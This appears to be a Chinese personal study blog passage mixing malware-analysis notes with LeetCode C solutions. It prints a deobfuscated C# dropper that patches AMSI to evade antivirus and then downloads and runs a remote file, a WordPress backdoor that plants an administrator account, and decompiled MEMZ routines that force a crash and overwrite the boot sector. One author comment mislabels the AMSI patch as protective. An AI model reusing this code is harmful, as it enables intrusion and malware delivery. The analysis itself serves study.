c1e1c';
$z24c5732 = y171e($z24c573);
Add-Type -TypeDefinition $z24c5732;
[yba2983]::c193b();

到了$z24c5732赋直接echo $z24c5732，就得到了下面的cs代码

1
2

using System;using System.Runtime.InteropServices;using System.Diagnostics;using System.IO;using System.Net;
public class yba2983{[DllImport("kernel32",EntryPoint="GetProcAddress")]public static extern IntPtr v779b(IntPtr x8d356,string v7be73);[DllImport("kernel32",EntryPoint="LoadLibrary")]public static extern IntPtr e6656d9(string zc6ea);[DllImport("kernel32",EntryPoint="VirtualProtect")]public static extern bool h7c586(IntPtr mda7864,UIntPtr k27bc1b,uint xcdaf29,out uint r84b39);[DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]static extern void ef5ae(IntPtr a948e8,IntPtr l8b12e,int g4c6e);public static int c193b(){IntPtr c2ae2d6=e6656d9(y171e("005844581b530f0d"));if(c2ae2d6!=IntPtr.Zero){IntPtr r963493=v779b(c2ae2d6,y171e("205844586654020f774257535211"));if(r963493!=IntPtr.Zero){UIntPtr hbaa2d=(UIntPtr)5;uint k9c379=0;if(h7c586(r963493,hbaa2d,0x40,out k9c379)){Byte[] je1ed={0x31,0xff,0x90};IntPtr nb327a=Marshal.AllocHGlobal(3);Marshal.Copy(je1ed,0,nb327a,3);ef5ae(new IntPtr(r963493.ToInt64()+0x001b),nb327a,3);}}}string s183fa=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\c9255" + y171e("4f504f54");new WebClient().DownloadFile(y171e("09414341460d4c4e56565f5b5601084647435a470613414e534758080447441f56580e4e4558411a0f2c16627c437366530664587a410e4d044d52"),s183fa);ProcessStartInfo y6cb2=new ProcessStartInfo(s183fa);Process.Start(y6cb2);return 0;}public static string y171e(string me8994){string x8d356="a57157c";string e6656d9="";for(int i=0; i<me8994.Length;i+=2){byte v779b=Convert.ToByte(me8994.Substring(i,2),16);e6656d9+=(char)(v779b^x8d356[(i/2)%x8d356.Length]);}return e6656d9;}}

格式化之后

using System;

using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
using System.Net;
public class yba2983 
{
	[DllImport("kernel32",EntryPoint="GetProcAddress")]public static extern IntPtr v779b(IntPtr x8d356,string v7be73);
	[DllImport("kernel32",EntryPoint="LoadLibrary")]public static extern IntPtr e6656d9(string zc6ea);
	[DllImport("kernel32",EntryPoint="VirtualProtect")]public static extern bool h7c586(IntPtr mda7864,UIntPtr k27bc1b,uint xcdaf29,out uint r84b39);
	[DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]static extern void ef5ae(IntPtr a948e8,IntPtr l8b12e,int g4c6e);
	public static int c193b() 
	{
		IntPtr c2ae2d6=e6656d9(y171e("005844581b530f0d"));
		if(c2ae2d6!=IntPtr.Zero) 
		{
			IntPtr r963493=v779b(c2ae2d6,y171e("205844586654020f774257535211"));
			if(r963493!=IntPtr.Zero) 
			{
				UIntPtr hbaa2d=(UIntPtr)5;
				uint k9c379=0;
				if(h7c586(r963493,hbaa2d,0x40,out k9c379)) 
				{
					byte[] je1ed={0x31,0xff,0x90}; // 这里的patch是绕过AMSI检测，可以防护病毒的入侵 https://xz.aliyun.com/t/4377 https://xz.aliyun.com/t/3095
					IntPtr nb327a=Marshal.AllocHGlobal(3);
					Marshal.Copy(je1ed,0,nb327a,3);
					ef5ae(new IntPtr(r963493.ToInt64()+0x001b),nb327a,3);
				}
			}
		}
		string s183fa=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\c9255" + y171e("4f504f54");
		new WebClient().DownloadFile(y171e("09414341460d4c4e56565f5b5601084647435a470613414e534758080447441f56580e4e4558411a0f2c16627c437366530664587a410e4d044d52"),s183fa);
		ProcessStartInfo y6cb2=new ProcessStartInfo(s183fa);
		Process.Start(y6cb2);
		return 0;
	}
	public static string y171e(string me8994) 
	{
		string x8d356="a57157c";
		string e6656d9="";
		for (int i=0; i<me8994.Length;i+=2) 
		{
			byte v779b=Convert.Tobyte(me8994.Substring(i,2),16);
			e6656d9+=(char)(v779b^x8d356[(i/2)%x8d356.Length]);
		}
		return e6656d9;
    }}

可以使用VS的重命名把对应的系统函数重命名掉。y171e就是解密函数了。

实现的功能就是从对应的URL下载文件并执行。

2021-04-21

每日看病毒分析和leetcode-3

leetcode-91. 解码方法

找出最长解码方法

最可笑的是一年前提交过了，且速度很快。现在不会了。

这次添加了笔记，应该不会忘了吧

int numDecodings(char * s){
	size_t len=strlen(s);
	if(len==0)return 0;
	if(s[0]=='0')return 0; // 第一个就为0，肯定是0
	if(len==1)return 1;
	int dp[40000]; // dp[i] 表示到第i个字符有dp[i]种解码方法
	memset(dp,0,sizeof(40000));
	dp[0]=1;
	int num=(s[0]-48)*10+s[1]-48;
	dp[1]=num>=11&&num<=26&&s[1]!='0'?2:1;
	if(s[0]>'2'&&s[1]=='0')return 0; // 不可能解码
	for(int i=2;i<len;i++){
		num=(s[i-1]-48)*10+s[i]-48;
		if(num==0||s[i]=='0'&&s[i-1]>'2')return 0; // 无法解码
		if(s[i]=='0')dp[i]=dp[i-2]; // 这个地方只能两个一起解码，所以解码数量没有增加
		else if(num>=11&&num<=26)dp[i]=dp[i-1]+dp[i-2]; // 两种情况，一种情况是两个字符分别解码，那么s[i]，还有一种是s[i]和s[i-1]一起解码
		else dp[i]=dp[i-1]; // 当num>26时，s[i]只能单独解码
	}
	return dp[len-1];
}

老毛桃携带木马病毒

火绒大大的文章 https://www.52pojie.cn/thread-1258730-1-1.html

分析

感觉东西不多，但是没有样本不好操作。尝试了虚拟机安装，老毛桃直接找不到虚拟磁盘，看来是对这个做了优化啊。😂

2021-04-20

每日看病毒分析和leetcode-2

php源码解密

https://www.52pojie.cn/thread-693641-1-1.html

先安装xdebug、vscode的PHP debug插件

https://github.com/nikic/PHP-Parser 使用这个格式化

然后单步调试，过掉反调试，一直到eval就可以看到源码

leetcode 实现strstr

KMP算法一直没看懂，这次看看

前缀函数$\pi(i)$表示$s[0:i]$最长相等的真前缀和真后缀

对于字符串aabaaab

$\pi(0)=0$，因为a没有真前缀和真后缀
$\pi(1)=1$，因为aa最长相等真前缀和真后缀长度为1
$\pi(2)=0$，因为aab没有对应的真前缀和真后缀
$\pi(3)=1$，因为aaba最长相等真前缀和真后缀长度为1
$\pi(4)=2$
$\pi(5)=2$
$\pi(6)=3$

KMP算法是严格$O(m)$的，靠的就是前缀函数的几个性质

$\pi(i)\le\pi(i-1)+1$，直观地想，增加了一个字符之后最多增加一个真前缀和真后缀的相等的字符
- 根据$\pi(i)$定义得到$\s[0:\pi(i)-1]=s[i-\pi(i)+1:i]$，即$\pi(i)$长度的真前缀和真后缀相等
- 两区间的右端点同时左移，得到$s[0:\pi(i)-2]=s[i-\pi(i)+1:i-1]$，即真前缀和真后缀各减少一个字符
- 根据$\pi(i-1)$定义得$\pi(i-1)\ge\pi(i)-1$，如果$\pi(i)\ne0$，那么最后一个字符肯定和真前缀地某个字符相等，删掉之后$\pi$函数肯定要减1
如果$s[i]=s[\pi(i-1)]$，那么$\pi(i)=\pi(i-1)+1$，直观地想，这分别是是$\pi(i-1)$的真后缀的下一个字符，所以成立
- 根据$\pi(i-1)$定义得到，$s[0:\pi(i-1)-1]=s[i-\pi(i-1):i-1]$，就是1第一个式子带入$i-1$（1）
- 因为$s[\pi(i-1)]=s[i]$，可得$s[0:\pi(i-1)]=s[i-\pi(i-1):i]$，真前缀和真后缀各增加一个相等字符
- 根据$\pi(i)$定义得$\pi(i)\ge\pi(i-1)+1$，即有相等的之后真前缀和真后缀相等长度可能增加，结合第一个性质得到$\pi(i)=\pi(i-1)+1$

这样就可以根据这两个性质求出$\pi(i)$，找到最大的$j$，满足$s[0:j-1]=s[i-j:i-1]$，且$s[i]=s[j]$，就得到$\pi(i)=j+1$

要求$j$尽可能大
要求$j$满足$s[i]=s[j]$

当$s[\pi(i-1)]\ne s[i]$时，$\pi(i)\le\pi(i-1)$，因为$j=\pi(i)-1$，所以$j\lt\pi(i)-1$，于是可以取（1）式两字串的长度为j的后缀，它们依然是相等的：$s[\pi(i-1)-j:\pi(i-1)-1]=s[i-j:i-1]$

实际上是一个有限状态自动机

接收到一个字符之后，如果和当前字符相等，就进入下一个字符的匹配，如果不相等，则依据当前状态和输入字符判断下一个状态是哪个，最终是一个有限状态自动机。

设要匹配的字符串为pat，原字符串为txt

构造状态转移矩阵dp，如果字符等于pat[j]，则转移到下一个状态，否则就回退到和自己相同的最长前缀。

int strStr(char * haystack, char * needle){
    int dp[40000][128];
	memset(dp,0,40000*128*sizeof(int));
	size_t xlen=strlen(haystack);
	size_t ylen=strlen(needle);
	if(ylen==0)return 0;
	int x=0; // 影子状态
	dp[0][needle[0]]=1;
	for(size_t i=1;i<ylen;i++){
		for(char c=0;c<127;c++){
			if(c==needle[i]){
				dp[i][c]=i+1;
			}else{
				dp[i][c]=dp[x][c];
			}
		}
		x=dp[x][needle[i]]; // 这里可以判断x和当前字符是否有最大前缀
	}
	int state=0;
	for(size_t i=0;i<xlen;i++){
		state=dp[state][haystack[i]];
		// printf("%d\n",state);
		if(state==ylen){
			return i-ylen+1;
		}
	}
	return -1;
}

参考：

题解

https://zhuanlan.zhihu.com/p/83334559

2021-04-19

每日看病毒分析和leetcode-1

justnews 5.2.3破解版后门

52pojie链接 https://www.52pojie.cn/thread-1084019-1-1.html

没有搜到样本，后门流程如下：

functions.php 添加了一个后门的动作，增加了一个访问密钥为go,backdoor/123456的账户
后面一个panel.php多层base64编码了网站、作者等信息。

这个作者的另一篇文章 https://www.52pojie.cn/thread-1074873-1-1.html

有样本，查看

add_action('wp_head', 'wp_backdoor');
function wp_backdoor()
{
	if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {
		require('wp-includes/registration.php');
		if (!username_exists('backdoor')) {
			$user_id = wp_create_user('backdoor', '123456');
			$user = new WP_User($user_id);
			$user->set_role('administrator');
		}
	}
}

和这个一样的逻辑啊。。

混淆加密帖子 https://www.52pojie.cn/thread-1074918-1-1.html

PHP Debug+vscode+xDebug+php7.2+PHP 智能补全，单步调试到eval就可以看到主逻辑

php解密资料(zym加密)https://www.52pojie.cn/thread-693641-1-1.html

伪装成docx的病毒分析

https://www.52pojie.cn/thread-1412858-1-1.html

没有给样本

可以使用Detous Hook反调试函数(新知识)

彩虹猫(MEMZ)病毒分析

https://www.52pojie.cn/thread-1096117-1-1.html

解压后有个bat文件，然后使用批处理+ActiveX命令

流程：

使用base64串建立x文件
建立x.js，用于base64解码x到z.zip
解码x之后再解压memz文件到%appdata%\MEMZ.exe
删除x，x.js，z.zip
执行MEMZ.exe

过程中所有的输出均被重定向到NUL

前面输入了一大堆base64，输出后是个magic number为PK的文件，结合bat文件命令，这应该是一个zip压缩包

解压之后就是那个memz.exe了(只有15kb的病毒，很有前途啊)

exeinfope扫描，32位，无壳

getSystemMetics https://baike.baidu.com/item/GetSystemMetrics/5608817 获取屏幕分辨率，分别是x,y

病毒第一次运行，会创建10个自己，参数是/watchdog，然后以main参数运行，并退出程序

/watchdog参数下会最终拒绝关机，不断地衍生出更多进程，每次会等待10秒。如果进程减少了，获取关机权限

获取关机权限函数

BOOL __usercall sub_401021@<eax>(int a1@<ebp>)
{
  int v1; // esi
  int v2; // esi
  HMODULE v3; // edi
  FARPROC RtlAdjustPrivilege; // ebx
  FARPROC NtRaiseHardError; // eax
  void (__cdecl *v6)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // esi
  HANDLE v7; // eax
  int v9; // [esp-20h] [ebp-28h]
  struct _TOKEN_PRIVILEGES v10; // [esp-18h] [ebp-20h] BYREF
  int v11; // [esp-8h] [ebp-10h] BYREF
  HANDLE v12; // [esp-4h] [ebp-Ch] BYREF
  int v13; // [esp+0h] [ebp-8h] BYREF
  int v14; // [esp+4h] [ebp-4h]

  v1 = 20;
  do
  {
    CreateThread(0, 0x1000u, StartAddress, 0, 0, 0);
    Sleep(0x64u);
    --v1;
  }
  while ( v1 );
  v2 = v14;
  v14 = a1;
  v9 = v2;
  v3 = LoadLibraryA("ntdll");
  RtlAdjustPrivilege = GetProcAddress(v3, "RtlAdjustPrivilege");
  NtRaiseHardError = GetProcAddress(v3, "NtRaiseHardError");
  v6 = (void (__cdecl *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))NtRaiseHardError;
  if ( RtlAdjustPrivilege && NtRaiseHardError )
  {
    ((void (__cdecl *)(int, int, _DWORD, char *, int, int))RtlAdjustPrivilege)(19, 1, 0, (char *)&v13 + 3, v13, v9);
    v6(-1073741790, 0, 0, 0, 6, &v11);
  }
  v7 = GetCurrentProcess();
  OpenProcessToken(v7, 0x28u, &v12);
  LookupPrivilegeValueW(0, L"SeShutdownPrivilege", (PLUID)v10.Privileges);
  v10.PrivilegeCount = 1;
  v10.Privileges[0].Attributes = 2;
  AdjustTokenPrivileges(v12, 0, &v10, 0, 0, 0);
  return ExitWindowsEx(6u, 0x10007u);
}

监测数量部分

while ( 1 )
  {
    v2 = CreateToolhelp32Snapshot(2u, 0);
    pe.dwSize = 556;
    Process32FirstW(v2, &pe);
    v3 = lpString1;
    v4 = 0;
    do
    {
      hObject = OpenProcess(0x400u, 0, pe.th32ProcessID);
      lpString2 = (LPCSTR)LocalAlloc(0x40u, 0x200u);
      GetProcessImageFileNameA(hObject, lpString2, 512);
      if ( !lstrcmpA(v3, lpString2) )
        ++v4;
      CloseHandle(hObject);
      LocalFree((HLOCAL)lpString2);
    }
    while ( Process32NextW(v2, &pe) );
    CloseHandle(v2);
    if ( v4 < v7 )
      sub_401021();
    v7 = v4;
    Sleep(0xAu);
  }

向PhysicalDrive0写入几个奇怪的字节，0x7A0大小。看大佬分析是改变了扇区启动项。

然后创建线程，函数列表位于405130，共10个函数

打开随机网址

int __cdecl sub_4014FC(int a1)
{
unsigned int v1; // eax
int v2; // eax

v1 = sub_401A55();
ShellExecuteA(0, "open", (&lpFile)[v1 % 0x2E], 0, 0, 10);
v2 = sub_401A55();
return sub_401B09(
        COERCE_UNSIGNED_INT64((double)a1),
        HIDWORD(COERCE_UNSIGNED_INT64((double)a1)),
        (double)(v2 % 200) + 1500.0 / ((double)a1 / 15.0 + 1.0) + 100.0);
}

随机设置鼠标位置

int __cdecl sub_40156D(int a1, int a2)
{
int v2; // esi
int v3; // edi
int v4; // ecx
int v5; // esi
int v6; // ecx
int v7; // eax
int v8; // ecx
int v9; // eax
int v11; // [esp-4h] [ebp-18h]
struct tagPOINT Point; // [esp+Ch] [ebp-8h] BYREF

GetCursorPos(&Point);
v2 = a2 / 2200 + 2;
v3 = sub_401A55(2200) % v2;
v5 = sub_401A55(v4) % v2;
v7 = sub_401A55(v6);
v11 = Point.y + v3 * (v7 % 3 - 1);
v9 = sub_401A55(v8);
SetCursorPos(Point.x + v5 * (v9 % 3 - 1), v11);
return 2;
}

通过sendInput发送随机ASCII码消息
播放SystemHand声音
随便画一些东西
弹出Still using this computer? lol
随机画图标
穷举桌面上的窗口，并发送超时消息。这样会导致系统崩溃
复制一个矩形
还是随机画矩形

leetcode每日一题 27. 移除元素

思路：先从后向前扫描相等的，直到数组空或遇到不相等的为止。然后从前向后扫描，直到遇到last为止。如果从前向后遇到要去除的数，则让last指向的数替换这个数，last前移，直到遇到下一个不相等的数为止

int removeElement(int* nums, int numsSize, int val){
    if(!numsSize)return 0;
    int last=numsSize-1;
    while(last>-1&&nums[last]==val){
        last--;
    }
    // if(!last)return last;
    for(int i=0;i<last;i++){
        if(nums[i]==val){
            nums[i]=nums[last];
            last--;
            while(last&&nums[last]==val){
                last--;
            }
        }
    }
    return last+1;
}